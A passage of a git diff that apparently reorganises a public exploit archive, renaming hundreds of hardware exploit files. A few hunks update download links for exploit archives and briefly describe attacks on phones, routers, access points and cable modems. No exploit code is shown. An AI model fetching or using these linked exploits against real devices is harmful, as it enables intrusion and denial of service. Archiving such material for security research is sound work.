exploits/hardware/dos/59.c diff --git a/platforms/hardware/dos/60.c b/exploits/hardware/dos/60.c similarity index 100% rename from platforms/hardware/dos/60.c rename to exploits/hardware/dos/60.c diff --git a/platforms/hardware/dos/6196.pl b/exploits/hardware/dos/6196.pl similarity index 100% rename from platforms/hardware/dos/6196.pl rename to exploits/hardware/dos/6196.pl diff --git a/platforms/hardware/dos/62.tcsh b/exploits/hardware/dos/62.tcsh old mode 100644 new mode 100755 similarity index 100% rename from platforms/hardware/dos/62.tcsh rename to exploits/hardware/dos/62.tcsh diff --git a/platforms/hardware/dos/6394.pl b/exploits/hardware/dos/6394.pl similarity index 100% rename from platforms/hardware/dos/6394.pl rename to exploits/hardware/dos/6394.pl diff --git a/platforms/hardware/dos/6459.txt b/exploits/hardware/dos/6459.txt similarity index 100% rename from platforms/hardware/dos/6459.txt rename to exploits/hardware/dos/6459.txt diff --git a/platforms/hardware/dos/6582.pl b/exploits/hardware/dos/6582.pl similarity index 100% rename from platforms/hardware/dos/6582.pl rename to exploits/hardware/dos/6582.pl diff --git a/platforms/hardware/dos/6726.txt b/exploits/hardware/dos/6726.txt similarity index 100% rename from platforms/hardware/dos/6726.txt rename to exploits/hardware/dos/6726.txt diff --git a/platforms/hardware/dos/688.c b/exploits/hardware/dos/688.c similarity index 100% rename from platforms/hardware/dos/688.c rename to exploits/hardware/dos/688.c diff --git a/platforms/hardware/dos/7060.txt b/exploits/hardware/dos/7060.txt similarity index 100% rename from platforms/hardware/dos/7060.txt rename to exploits/hardware/dos/7060.txt diff --git a/platforms/hardware/dos/7220.txt b/exploits/hardware/dos/7220.txt similarity index 100% rename from platforms/hardware/dos/7220.txt rename to exploits/hardware/dos/7220.txt diff --git a/platforms/hardware/dos/7535.php b/exploits/hardware/dos/7535.php similarity index 100% rename from platforms/hardware/dos/7535.php rename to exploits/hardware/dos/7535.php diff --git a/platforms/hardware/dos/7632.txt b/exploits/hardware/dos/7632.txt similarity index 100% rename from platforms/hardware/dos/7632.txt rename to exploits/hardware/dos/7632.txt diff --git a/platforms/hardware/dos/7776.c b/exploits/hardware/dos/7776.c similarity index 100% rename from platforms/hardware/dos/7776.c rename to exploits/hardware/dos/7776.c diff --git a/platforms/hardware/dos/8008.txt b/exploits/hardware/dos/8008.txt similarity index 100% rename from platforms/hardware/dos/8008.txt rename to exploits/hardware/dos/8008.txt diff --git a/platforms/hardware/dos/8013.txt b/exploits/hardware/dos/8013.txt similarity index 90% rename from platforms/hardware/dos/8013.txt rename to exploits/hardware/dos/8013.txt index c8cb63b3c..cb60064da 100644 --- a/platforms/hardware/dos/8013.txt +++ b/exploits/hardware/dos/8013.txt @@ -27,7 +27,7 @@ POC/EXPLOIT you can open this url with the browser or send mms with this image. http://es.geocities.com/jplopezy/nokiacrash.jpg -alt: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8013.jpg (2009-nokiacrash.jpg) +alt: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/8013.jpg (2009-nokiacrash.jpg) ------------------------------------------------------ Juan Pablo Lopez Yacubian diff --git a/platforms/hardware/dos/8051.html b/exploits/hardware/dos/8051.html similarity index 100% rename from platforms/hardware/dos/8051.html rename to exploits/hardware/dos/8051.html diff --git a/platforms/hardware/dos/8106.txt b/exploits/hardware/dos/8106.txt similarity index 100% rename from platforms/hardware/dos/8106.txt rename to exploits/hardware/dos/8106.txt diff --git a/platforms/hardware/dos/8125.rb b/exploits/hardware/dos/8125.rb similarity index 100% rename from platforms/hardware/dos/8125.rb rename to exploits/hardware/dos/8125.rb diff --git a/platforms/hardware/dos/8187.sh b/exploits/hardware/dos/8187.sh similarity index 100% rename from platforms/hardware/dos/8187.sh rename to exploits/hardware/dos/8187.sh diff --git a/platforms/hardware/dos/8260.txt b/exploits/hardware/dos/8260.txt similarity index 100% rename from platforms/hardware/dos/8260.txt rename to exploits/hardware/dos/8260.txt diff --git a/platforms/hardware/dos/8313.txt b/exploits/hardware/dos/8313.txt similarity index 100% rename from platforms/hardware/dos/8313.txt rename to exploits/hardware/dos/8313.txt diff --git a/platforms/hardware/dos/8393.txt b/exploits/hardware/dos/8393.txt similarity index 100% rename from platforms/hardware/dos/8393.txt rename to exploits/hardware/dos/8393.txt diff --git a/platforms/hardware/dos/8490.sh b/exploits/hardware/dos/8490.sh similarity index 100% rename from platforms/hardware/dos/8490.sh rename to exploits/hardware/dos/8490.sh diff --git a/platforms/hardware/dos/856.c b/exploits/hardware/dos/856.c similarity index 100% rename from platforms/hardware/dos/856.c rename to exploits/hardware/dos/856.c diff --git a/platforms/hardware/dos/8584.py b/exploits/hardware/dos/8584.py similarity index 100% rename from platforms/hardware/dos/8584.py rename to exploits/hardware/dos/8584.py diff --git a/platforms/hardware/dos/8964.txt b/exploits/hardware/dos/8964.txt similarity index 100% rename from platforms/hardware/dos/8964.txt rename to exploits/hardware/dos/8964.txt diff --git a/platforms/hardware/dos/9067.py b/exploits/hardware/dos/9067.py similarity index 100% rename from platforms/hardware/dos/9067.py rename to exploits/hardware/dos/9067.py diff --git a/platforms/hardware/dos/9268.rb b/exploits/hardware/dos/9268.rb similarity index 100% rename from platforms/hardware/dos/9268.rb rename to exploits/hardware/dos/9268.rb diff --git a/platforms/hardware/dos/9514.py b/exploits/hardware/dos/9514.py similarity index 100% rename from platforms/hardware/dos/9514.py rename to exploits/hardware/dos/9514.py diff --git a/platforms/hardware/dos/9646.php b/exploits/hardware/dos/9646.php similarity index 100% rename from platforms/hardware/dos/9646.php rename to exploits/hardware/dos/9646.php diff --git a/platforms/hardware/dos/9666.php b/exploits/hardware/dos/9666.php similarity index 100% rename from platforms/hardware/dos/9666.php rename to exploits/hardware/dos/9666.php diff --git a/platforms/hardware/dos/9956.txt b/exploits/hardware/dos/9956.txt similarity index 100% rename from platforms/hardware/dos/9956.txt rename to exploits/hardware/dos/9956.txt diff --git a/platforms/hardware/dos/9980.txt b/exploits/hardware/dos/9980.txt similarity index 100% rename from platforms/hardware/dos/9980.txt rename to exploits/hardware/dos/9980.txt diff --git a/platforms/hardware/local/14727.py b/exploits/hardware/local/14727.py similarity index 100% rename from platforms/hardware/local/14727.py rename to exploits/hardware/local/14727.py diff --git a/platforms/hardware/local/20999.c b/exploits/hardware/local/20999.c similarity index 100% rename from platforms/hardware/local/20999.c rename to exploits/hardware/local/20999.c diff --git a/platforms/hardware/local/21000.sh b/exploits/hardware/local/21000.sh similarity index 100% rename from platforms/hardware/local/21000.sh rename to exploits/hardware/local/21000.sh diff --git a/platforms/hardware/local/21001.txt b/exploits/hardware/local/21001.txt similarity index 91% rename from platforms/hardware/local/21001.txt rename to exploits/hardware/local/21001.txt index 973b0ab27..4474ac0d4 100644 --- a/platforms/hardware/local/21001.txt +++ b/exploits/hardware/local/21001.txt @@ -8,4 +8,4 @@ These files are created in /tmp with a guessable naming format, making it trivia Since user-supplied data is written to the target file, attackers may be able to elevate privileges. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21001.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21001.tar.gz \ No newline at end of file diff --git a/platforms/hardware/local/24899.txt b/exploits/hardware/local/24899.txt similarity index 100% rename from platforms/hardware/local/24899.txt rename to exploits/hardware/local/24899.txt diff --git a/platforms/hardware/local/25718.txt b/exploits/hardware/local/25718.txt similarity index 100% rename from platforms/hardware/local/25718.txt rename to exploits/hardware/local/25718.txt diff --git a/platforms/hardware/local/27285.txt b/exploits/hardware/local/27285.txt similarity index 100% rename from platforms/hardware/local/27285.txt rename to exploits/hardware/local/27285.txt diff --git a/platforms/hardware/local/30237.sh b/exploits/hardware/local/30237.sh similarity index 100% rename from platforms/hardware/local/30237.sh rename to exploits/hardware/local/30237.sh diff --git a/platforms/hardware/local/32370.txt b/exploits/hardware/local/32370.txt similarity index 100% rename from platforms/hardware/local/32370.txt rename to exploits/hardware/local/32370.txt diff --git a/platforms/hardware/local/34954.txt b/exploits/hardware/local/34954.txt similarity index 100% rename from platforms/hardware/local/34954.txt rename to exploits/hardware/local/34954.txt diff --git a/platforms/hardware/local/36813.txt b/exploits/hardware/local/36813.txt similarity index 100% rename from platforms/hardware/local/36813.txt rename to exploits/hardware/local/36813.txt diff --git a/platforms/hardware/local/40271.txt b/exploits/hardware/local/40271.txt similarity index 85% rename from platforms/hardware/local/40271.txt rename to exploits/hardware/local/40271.txt index 91d6e1af9..b9990ec53 100644 --- a/platforms/hardware/local/40271.txt +++ b/exploits/hardware/local/40271.txt @@ -5,4 +5,4 @@ Full Exploit: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40271.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/40271.zip \ No newline at end of file diff --git a/platforms/hardware/local/41745.txt b/exploits/hardware/local/41745.txt similarity index 100% rename from platforms/hardware/local/41745.txt rename to exploits/hardware/local/41745.txt diff --git a/platforms/hardware/local/41754.txt b/exploits/hardware/local/41754.txt similarity index 100% rename from platforms/hardware/local/41754.txt rename to exploits/hardware/local/41754.txt diff --git a/platforms/hardware/local/8833.txt b/exploits/hardware/local/8833.txt similarity index 100% rename from platforms/hardware/local/8833.txt rename to exploits/hardware/local/8833.txt diff --git a/platforms/hardware/local/9688.txt b/exploits/hardware/local/9688.txt similarity index 100% rename from platforms/hardware/local/9688.txt rename to exploits/hardware/local/9688.txt diff --git a/platforms/hardware/local/9955.txt b/exploits/hardware/local/9955.txt similarity index 100% rename from platforms/hardware/local/9955.txt rename to exploits/hardware/local/9955.txt diff --git a/platforms/hardware/remote/10000.txt b/exploits/hardware/remote/10000.txt similarity index 100% rename from platforms/hardware/remote/10000.txt rename to exploits/hardware/remote/10000.txt diff --git a/platforms/hardware/remote/10011.txt b/exploits/hardware/remote/10011.txt similarity index 100% rename from platforms/hardware/remote/10011.txt rename to exploits/hardware/remote/10011.txt diff --git a/platforms/hardware/remote/10055.txt b/exploits/hardware/remote/10055.txt similarity index 100% rename from platforms/hardware/remote/10055.txt rename to exploits/hardware/remote/10055.txt diff --git a/platforms/hardware/remote/10081.txt b/exploits/hardware/remote/10081.txt similarity index 100% rename from platforms/hardware/remote/10081.txt rename to exploits/hardware/remote/10081.txt diff --git a/platforms/hardware/remote/10362.txt b/exploits/hardware/remote/10362.txt similarity index 100% rename from platforms/hardware/remote/10362.txt rename to exploits/hardware/remote/10362.txt diff --git a/platforms/hardware/remote/10451.txt b/exploits/hardware/remote/10451.txt similarity index 100% rename from platforms/hardware/remote/10451.txt rename to exploits/hardware/remote/10451.txt diff --git a/platforms/hardware/remote/10510.txt b/exploits/hardware/remote/10510.txt similarity index 100% rename from platforms/hardware/remote/10510.txt rename to exploits/hardware/remote/10510.txt diff --git a/platforms/hardware/remote/1081.c b/exploits/hardware/remote/1081.c similarity index 100% rename from platforms/hardware/remote/1081.c rename to exploits/hardware/remote/1081.c diff --git a/platforms/hardware/remote/11822.txt b/exploits/hardware/remote/11822.txt similarity index 100% rename from platforms/hardware/remote/11822.txt rename to exploits/hardware/remote/11822.txt diff --git a/platforms/hardware/remote/12265.txt b/exploits/hardware/remote/12265.txt similarity index 100% rename from platforms/hardware/remote/12265.txt rename to exploits/hardware/remote/12265.txt diff --git a/platforms/hardware/remote/12298.txt b/exploits/hardware/remote/12298.txt similarity index 92% rename from platforms/hardware/remote/12298.txt rename to exploits/hardware/remote/12298.txt index 6bfb68e3b..892e063d9 100644 --- a/platforms/hardware/remote/12298.txt +++ b/exploits/hardware/remote/12298.txt @@ -9,7 +9,7 @@ # V100R001B121Telmex # Exploit Download Link: # http://www.hakim.ws/huawei/HG520_udpinfo.tar.gz -# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12298.tar.gz (HG520_udpinfo.tar.gz) +# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/12298.tar.gz (HG520_udpinfo.tar.gz) By sending a specially crafted UDP packet you can remotely obtain the diff --git a/platforms/hardware/remote/12865.txt b/exploits/hardware/remote/12865.txt similarity index 100% rename from platforms/hardware/remote/12865.txt rename to exploits/hardware/remote/12865.txt diff --git a/platforms/hardware/remote/1333.pm b/exploits/hardware/remote/1333.pm similarity index 100% rename from platforms/hardware/remote/1333.pm rename to exploits/hardware/remote/1333.pm diff --git a/platforms/hardware/remote/14536.txt b/exploits/hardware/remote/14536.txt similarity index 100% rename from platforms/hardware/remote/14536.txt rename to exploits/hardware/remote/14536.txt diff --git a/platforms/hardware/remote/15505.txt b/exploits/hardware/remote/15505.txt similarity index 100% rename from platforms/hardware/remote/15505.txt rename to exploits/hardware/remote/15505.txt diff --git a/platforms/hardware/remote/15631.txt b/exploits/hardware/remote/15631.txt similarity index 100% rename from platforms/hardware/remote/15631.txt rename to exploits/hardware/remote/15631.txt diff --git a/platforms/hardware/remote/15842.txt b/exploits/hardware/remote/15842.txt similarity index 100% rename from platforms/hardware/remote/15842.txt rename to exploits/hardware/remote/15842.txt diff --git a/platforms/hardware/remote/16100.txt b/exploits/hardware/remote/16100.txt similarity index 100% rename from platforms/hardware/remote/16100.txt rename to exploits/hardware/remote/16100.txt diff --git a/platforms/hardware/remote/16123.txt b/exploits/hardware/remote/16123.txt similarity index 100% rename from platforms/hardware/remote/16123.txt rename to exploits/hardware/remote/16123.txt diff --git a/platforms/hardware/remote/16149.txt b/exploits/hardware/remote/16149.txt similarity index 100% rename from platforms/hardware/remote/16149.txt rename to exploits/hardware/remote/16149.txt diff --git a/platforms/hardware/remote/16226.txt b/exploits/hardware/remote/16226.txt similarity index 100% rename from platforms/hardware/remote/16226.txt rename to exploits/hardware/remote/16226.txt diff --git a/platforms/hardware/remote/16227.txt b/exploits/hardware/remote/16227.txt similarity index 100% rename from platforms/hardware/remote/16227.txt rename to exploits/hardware/remote/16227.txt diff --git a/platforms/hardware/remote/16238.txt b/exploits/hardware/remote/16238.txt similarity index 100% rename from platforms/hardware/remote/16238.txt rename to exploits/hardware/remote/16238.txt diff --git a/platforms/hardware/remote/16239.txt b/exploits/hardware/remote/16239.txt similarity index 100% rename from platforms/hardware/remote/16239.txt rename to exploits/hardware/remote/16239.txt diff --git a/platforms/hardware/remote/16240.txt b/exploits/hardware/remote/16240.txt similarity index 100% rename from platforms/hardware/remote/16240.txt rename to exploits/hardware/remote/16240.txt diff --git a/platforms/hardware/remote/16243.py b/exploits/hardware/remote/16243.py similarity index 100% rename from platforms/hardware/remote/16243.py rename to exploits/hardware/remote/16243.py diff --git a/platforms/hardware/remote/16244.py b/exploits/hardware/remote/16244.py similarity index 100% rename from platforms/hardware/remote/16244.py rename to exploits/hardware/remote/16244.py diff --git a/platforms/hardware/remote/16245.py b/exploits/hardware/remote/16245.py similarity index 100% rename from platforms/hardware/remote/16245.py rename to exploits/hardware/remote/16245.py diff --git a/platforms/hardware/remote/16275.txt b/exploits/hardware/remote/16275.txt similarity index 100% rename from platforms/hardware/remote/16275.txt rename to exploits/hardware/remote/16275.txt diff --git a/platforms/hardware/remote/16388.rb b/exploits/hardware/remote/16388.rb similarity index 100% rename from platforms/hardware/remote/16388.rb rename to exploits/hardware/remote/16388.rb diff --git a/platforms/hardware/remote/16854.rb b/exploits/hardware/remote/16854.rb similarity index 100% rename from platforms/hardware/remote/16854.rb rename to exploits/hardware/remote/16854.rb diff --git a/platforms/hardware/remote/16862.rb b/exploits/hardware/remote/16862.rb similarity index 100% rename from platforms/hardware/remote/16862.rb rename to exploits/hardware/remote/16862.rb diff --git a/platforms/hardware/remote/16868.rb b/exploits/hardware/remote/16868.rb similarity index 100% rename from platforms/hardware/remote/16868.rb rename to exploits/hardware/remote/16868.rb diff --git a/platforms/hardware/remote/16869.rb b/exploits/hardware/remote/16869.rb similarity index 100% rename from platforms/hardware/remote/16869.rb rename to exploits/hardware/remote/16869.rb diff --git a/platforms/hardware/remote/169.pl b/exploits/hardware/remote/169.pl similarity index 100% rename from platforms/hardware/remote/169.pl rename to exploits/hardware/remote/169.pl diff --git a/platforms/hardware/remote/16993.pl b/exploits/hardware/remote/16993.pl similarity index 100% rename from platforms/hardware/remote/16993.pl rename to exploits/hardware/remote/16993.pl diff --git a/platforms/hardware/remote/17244.txt b/exploits/hardware/remote/17244.txt similarity index 100% rename from platforms/hardware/remote/17244.txt rename to exploits/hardware/remote/17244.txt diff --git a/platforms/hardware/remote/17279.txt b/exploits/hardware/remote/17279.txt similarity index 100% rename from platforms/hardware/remote/17279.txt rename to exploits/hardware/remote/17279.txt diff --git a/platforms/hardware/remote/17290.txt b/exploits/hardware/remote/17290.txt similarity index 100% rename from platforms/hardware/remote/17290.txt rename to exploits/hardware/remote/17290.txt diff --git a/platforms/hardware/remote/17356.txt b/exploits/hardware/remote/17356.txt similarity index 100% rename from platforms/hardware/remote/17356.txt rename to exploits/hardware/remote/17356.txt diff --git a/platforms/hardware/remote/17422.txt b/exploits/hardware/remote/17422.txt similarity index 100% rename from platforms/hardware/remote/17422.txt rename to exploits/hardware/remote/17422.txt diff --git a/platforms/hardware/remote/17507.py b/exploits/hardware/remote/17507.py similarity index 100% rename from platforms/hardware/remote/17507.py rename to exploits/hardware/remote/17507.py diff --git a/platforms/hardware/remote/17635.rb b/exploits/hardware/remote/17635.rb similarity index 100% rename from platforms/hardware/remote/17635.rb rename to exploits/hardware/remote/17635.rb diff --git a/platforms/hardware/remote/17636.rb b/exploits/hardware/remote/17636.rb similarity index 100% rename from platforms/hardware/remote/17636.rb rename to exploits/hardware/remote/17636.rb diff --git a/platforms/hardware/remote/17645.py b/exploits/hardware/remote/17645.py similarity index 100% rename from platforms/hardware/remote/17645.py rename to exploits/hardware/remote/17645.py diff --git a/platforms/hardware/remote/17670.py b/exploits/hardware/remote/17670.py similarity index 100% rename from platforms/hardware/remote/17670.py rename to exploits/hardware/remote/17670.py diff --git a/platforms/hardware/remote/17883.txt b/exploits/hardware/remote/17883.txt similarity index 100% rename from platforms/hardware/remote/17883.txt rename to exploits/hardware/remote/17883.txt diff --git a/platforms/hardware/remote/18079.pl b/exploits/hardware/remote/18079.pl similarity index 100% rename from platforms/hardware/remote/18079.pl rename to exploits/hardware/remote/18079.pl diff --git a/platforms/hardware/remote/18172.rb b/exploits/hardware/remote/18172.rb similarity index 100% rename from platforms/hardware/remote/18172.rb rename to exploits/hardware/remote/18172.rb diff --git a/platforms/hardware/remote/18291.txt b/exploits/hardware/remote/18291.txt similarity index 87% rename from platforms/hardware/remote/18291.txt rename to exploits/hardware/remote/18291.txt index fcea128b0..f52fab7b3 100644 --- a/platforms/hardware/remote/18291.txt +++ b/exploits/hardware/remote/18291.txt @@ -7,4 +7,4 @@ # Tested on: Access points from Linksys, Cisco, D-Link, TP-Link, Trendnet, and others # CVE : No CVE US-CERT VU#723755 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18291.tar.gz (reaver-1.1.tar.gz) \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/18291.tar.gz (reaver-1.1.tar.gz) \ No newline at end of file diff --git a/platforms/hardware/remote/18673.txt b/exploits/hardware/remote/18673.txt similarity index 100% rename from platforms/hardware/remote/18673.txt rename to exploits/hardware/remote/18673.txt diff --git a/platforms/hardware/remote/18675.txt b/exploits/hardware/remote/18675.txt similarity index 100% rename from platforms/hardware/remote/18675.txt rename to exploits/hardware/remote/18675.txt diff --git a/platforms/hardware/remote/18779.txt b/exploits/hardware/remote/18779.txt similarity index 100% rename from platforms/hardware/remote/18779.txt rename to exploits/hardware/remote/18779.txt diff --git a/platforms/hardware/remote/1889.txt b/exploits/hardware/remote/1889.txt similarity index 100% rename from platforms/hardware/remote/1889.txt rename to exploits/hardware/remote/1889.txt diff --git a/platforms/hardware/remote/18893.py b/exploits/hardware/remote/18893.py similarity index 100% rename from platforms/hardware/remote/18893.py rename to exploits/hardware/remote/18893.py diff --git a/platforms/hardware/remote/18901.rb b/exploits/hardware/remote/18901.rb similarity index 100% rename from platforms/hardware/remote/18901.rb rename to exploits/hardware/remote/18901.rb diff --git a/platforms/hardware/remote/19091.py b/exploits/hardware/remote/19091.py similarity index 100% rename from platforms/hardware/remote/19091.py rename to exploits/hardware/remote/19091.py diff --git a/platforms/hardware/remote/19099.rb b/exploits/hardware/remote/19099.rb similarity index 100% rename from platforms/hardware/remote/19099.rb rename to exploits/hardware/remote/19099.rb diff --git a/platforms/hardware/remote/19402.txt b/exploits/hardware/remote/19402.txt similarity index 100% rename from platforms/hardware/remote/19402.txt rename to exploits/hardware/remote/19402.txt diff --git a/platforms/hardware/remote/19444.txt b/exploits/hardware/remote/19444.txt similarity index 100% rename from platforms/hardware/remote/19444.txt rename to exploits/hardware/remote/19444.txt diff --git a/platforms/hardware/remote/19538.txt b/exploits/hardware/remote/19538.txt similarity index 85% rename from platforms/hardware/remote/19538.txt rename to exploits/hardware/remote/19538.txt index b8aae1932..05c876a94 100644 --- a/platforms/hardware/remote/19538.txt +++ b/exploits/hardware/remote/19538.txt @@ -2,6 +2,6 @@ source: http://www.securityfocus.com/bid/695/info Hybrid Network's cable modems are vulnerable to several different types of attack due to a lack of authentication for the remote administration/configuration system. The cable modems use a protocol called HSMP, which uses UDP as its transport layer protocol. This makes it trivial to spoof packets and possible for hackers to compromise cable-modem subscribers anonymously. The possible consequences of this problem being exploited are very serious and range from denial of service attacks to running arbitrary code on the modem. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19538-1.tar.gz -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19538-2.tar.gz -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19538-3.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19538-1.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19538-2.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19538-3.tar.gz \ No newline at end of file diff --git a/platforms/hardware/remote/19554.c b/exploits/hardware/remote/19554.c similarity index 100% rename from platforms/hardware/remote/19554.c rename to exploits/hardware/remote/19554.c diff --git a/platforms/hardware/remote/19555.pl b/exploits/hardware/remote/19555.pl similarity index 100% rename from platforms/hardware/remote/19555.pl rename to exploits/hardware/remote/19555.pl diff --git a/platforms/hardware/remote/19632.txt b/exploits/hardware/remote/19632.txt similarity index 100% rename from platforms/hardware/remote/19632.txt rename to exploits/hardware/remote/19632.txt diff --git a/platforms/hardware/remote/19831.rb b/exploits/hardware/remote/19831.rb similarity index 100% rename from platforms/hardware/remote/19831.rb rename to exploits/hardware/remote/19831.rb diff --git a/platforms/hardware/remote/19832.rb b/exploits/hardware/remote/19832.rb similarity index 100% rename from platforms/hardware/remote/19832.rb rename to exploits/hardware/remote/19832.rb diff --git a/platforms/hardware/remote/19833.rb b/exploits/hardware/remote/19833.rb similarity index 100% rename from platforms/hardware/remote/19833.rb rename to exploits/hardware/remote/19833.rb diff --git a/platforms/hardware/remote/19882.pl b/exploits/hardware/remote/19882.pl similarity index 100% rename from platforms/hardware/remote/19882.pl rename to exploits/hardware/remote/19882.pl diff --git a/platforms/hardware/remote/19901.txt b/exploits/hardware/remote/19901.txt similarity index 100% rename from platforms/hardware/remote/19901.txt rename to exploits/hardware/remote/19901.txt diff --git a/platforms/hardware/remote/19943.txt b/exploits/hardware/remote/19943.txt similarity index 100% rename from platforms/hardware/remote/19943.txt rename to exploits/hardware/remote/19943.txt diff --git a/platforms/hardware/remote/20067.c b/exploits/hardware/remote/20067.c similarity index 100% rename from platforms/hardware/remote/20067.c rename to exploits/hardware/remote/20067.c diff --git a/platforms/hardware/remote/20231.txt b/exploits/hardware/remote/20231.txt similarity index 100% rename from platforms/hardware/remote/20231.txt rename to exploits/hardware/remote/20231.txt diff --git a/platforms/hardware/remote/20330.pl b/exploits/hardware/remote/20330.pl similarity index 100% rename from platforms/hardware/remote/20330.pl rename to exploits/hardware/remote/20330.pl diff --git a/platforms/hardware/remote/2034.txt b/exploits/hardware/remote/2034.txt similarity index 69% rename from platforms/hardware/remote/2034.txt rename to exploits/hardware/remote/2034.txt index ba069aa56..2f3a01218 100644 --- a/platforms/hardware/remote/2034.txt +++ b/exploits/hardware/remote/2034.txt @@ -1,5 +1,5 @@ BT Voyager 2091 (Wireless ADSL) Multiple Vulnerabilities -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2034.tgz (07182006-btvoyager.tgz) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/2034.tgz (07182006-btvoyager.tgz) # milw0rm.com [2006-07-18] \ No newline at end of file diff --git a/platforms/hardware/remote/20369.sh b/exploits/hardware/remote/20369.sh similarity index 100% rename from platforms/hardware/remote/20369.sh rename to exploits/hardware/remote/20369.sh diff --git a/platforms/hardware/remote/20372.pl b/exploits/hardware/remote/20372.pl similarity index 100% rename from platforms/hardware/remote/20372.pl rename to exploits/hardware/remote/20372.pl diff --git a/platforms/hardware/remote/2048.pl b/exploits/hardware/remote/2048.pl similarity index 100% rename from platforms/hardware/remote/2048.pl rename to exploits/hardware/remote/2048.pl diff --git a/platforms/hardware/remote/20565.c b/exploits/hardware/remote/20565.c similarity index 100% rename from platforms/hardware/remote/20565.c rename to exploits/hardware/remote/20565.c diff --git a/platforms/hardware/remote/20652.txt b/exploits/hardware/remote/20652.txt similarity index 100% rename from platforms/hardware/remote/20652.txt rename to exploits/hardware/remote/20652.txt diff --git a/platforms/hardware/remote/20806.txt b/exploits/hardware/remote/20806.txt similarity index 100% rename from platforms/hardware/remote/20806.txt rename to exploits/hardware/remote/20806.txt diff --git a/platforms/hardware/remote/20892.txt b/exploits/hardware/remote/20892.txt similarity index 100% rename from platforms/hardware/remote/20892.txt rename to exploits/hardware/remote/20892.txt diff --git a/platforms/hardware/remote/20975.pl b/exploits/hardware/remote/20975.pl similarity index 100% rename from platforms/hardware/remote/20975.pl rename to exploits/hardware/remote/20975.pl diff --git a/platforms/hardware/remote/20976.c b/exploits/hardware/remote/20976.c similarity index 100% rename from platforms/hardware/remote/20976.c rename to exploits/hardware/remote/20976.c diff --git a/platforms/hardware/remote/20977.pl b/exploits/hardware/remote/20977.pl similarity index 100% rename from platforms/hardware/remote/20977.pl rename to exploits/hardware/remote/20977.pl diff --git a/platforms/hardware/remote/20978.pl b/exploits/hardware/remote/20978.pl similarity index 100% rename from platforms/hardware/remote/20978.pl rename to exploits/hardware/remote/20978.pl diff --git a/platforms/hardware/remote/21011.pl b/exploits/hardware/remote/21011.pl similarity index 100% rename from platforms/hardware/remote/21011.pl rename to exploits/hardware/remote/21011.pl diff --git a/platforms/hardware/remote/21015.pl b/exploits/hardware/remote/21015.pl similarity index 100% rename from platforms/hardware/remote/21015.pl rename to exploits/hardware/remote/21015.pl diff --git a/platforms/hardware/remote/21186.txt b/exploits/hardware/remote/21186.txt similarity index 100% rename from platforms/hardware/remote/21186.txt rename to exploits/hardware/remote/21186.txt diff --git a/platforms/hardware/remote/21243.pl b/exploits/hardware/remote/21243.pl similarity index 100% rename from platforms/hardware/remote/21243.pl rename to exploits/hardware/remote/21243.pl diff --git a/platforms/hardware/remote/21268.py b/exploits/hardware/remote/21268.py similarity index 100% rename from platforms/hardware/remote/21268.py rename to exploits/hardware/remote/21268.py diff --git a/platforms/hardware/remote/21285.txt b/exploits/hardware/remote/21285.txt similarity index 100% rename from platforms/hardware/remote/21285.txt rename to exploits/hardware/remote/21285.txt diff --git a/platforms/hardware/remote/2136.txt b/exploits/hardware/remote/2136.txt similarity index 100% rename from platforms/hardware/remote/2136.txt rename to exploits/hardware/remote/2136.txt diff --git a/platforms/hardware/remote/21378.txt b/exploits/hardware/remote/21378.txt similarity index 100% rename from platforms/hardware/remote/21378.txt rename to exploits/hardware/remote/21378.txt diff --git a/platforms/hardware/remote/21441.txt b/exploits/hardware/remote/21441.txt similarity index 100% rename from platforms/hardware/remote/21441.txt rename to exploits/hardware/remote/21441.txt diff --git a/platforms/hardware/remote/2145.txt b/exploits/hardware/remote/2145.txt similarity index 100% rename from platforms/hardware/remote/2145.txt rename to exploits/hardware/remote/2145.txt diff --git a/platforms/hardware/remote/21456.txt b/exploits/hardware/remote/21456.txt similarity index 100% rename from platforms/hardware/remote/21456.txt rename to exploits/hardware/remote/21456.txt diff --git a/platforms/hardware/remote/21513.c b/exploits/hardware/remote/21513.c similarity index 100% rename from platforms/hardware/remote/21513.c rename to exploits/hardware/remote/21513.c diff --git a/platforms/hardware/remote/21699.txt b/exploits/hardware/remote/21699.txt similarity index 100% rename from platforms/hardware/remote/21699.txt rename to exploits/hardware/remote/21699.txt diff --git a/platforms/hardware/remote/21827.txt b/exploits/hardware/remote/21827.txt similarity index 100% rename from platforms/hardware/remote/21827.txt rename to exploits/hardware/remote/21827.txt diff --git a/platforms/hardware/remote/21944.pl b/exploits/hardware/remote/21944.pl similarity index 100% rename from platforms/hardware/remote/21944.pl rename to exploits/hardware/remote/21944.pl diff --git a/platforms/hardware/remote/21983.c b/exploits/hardware/remote/21983.c similarity index 100% rename from platforms/hardware/remote/21983.c rename to exploits/hardware/remote/21983.c diff --git a/platforms/hardware/remote/22236.txt b/exploits/hardware/remote/22236.txt similarity index 100% rename from platforms/hardware/remote/22236.txt rename to exploits/hardware/remote/22236.txt diff --git a/platforms/hardware/remote/22244.txt b/exploits/hardware/remote/22244.txt similarity index 100% rename from platforms/hardware/remote/22244.txt rename to exploits/hardware/remote/22244.txt diff --git a/platforms/hardware/remote/22271.c b/exploits/hardware/remote/22271.c similarity index 100% rename from platforms/hardware/remote/22271.c rename to exploits/hardware/remote/22271.c diff --git a/platforms/hardware/remote/22319.txt b/exploits/hardware/remote/22319.txt similarity 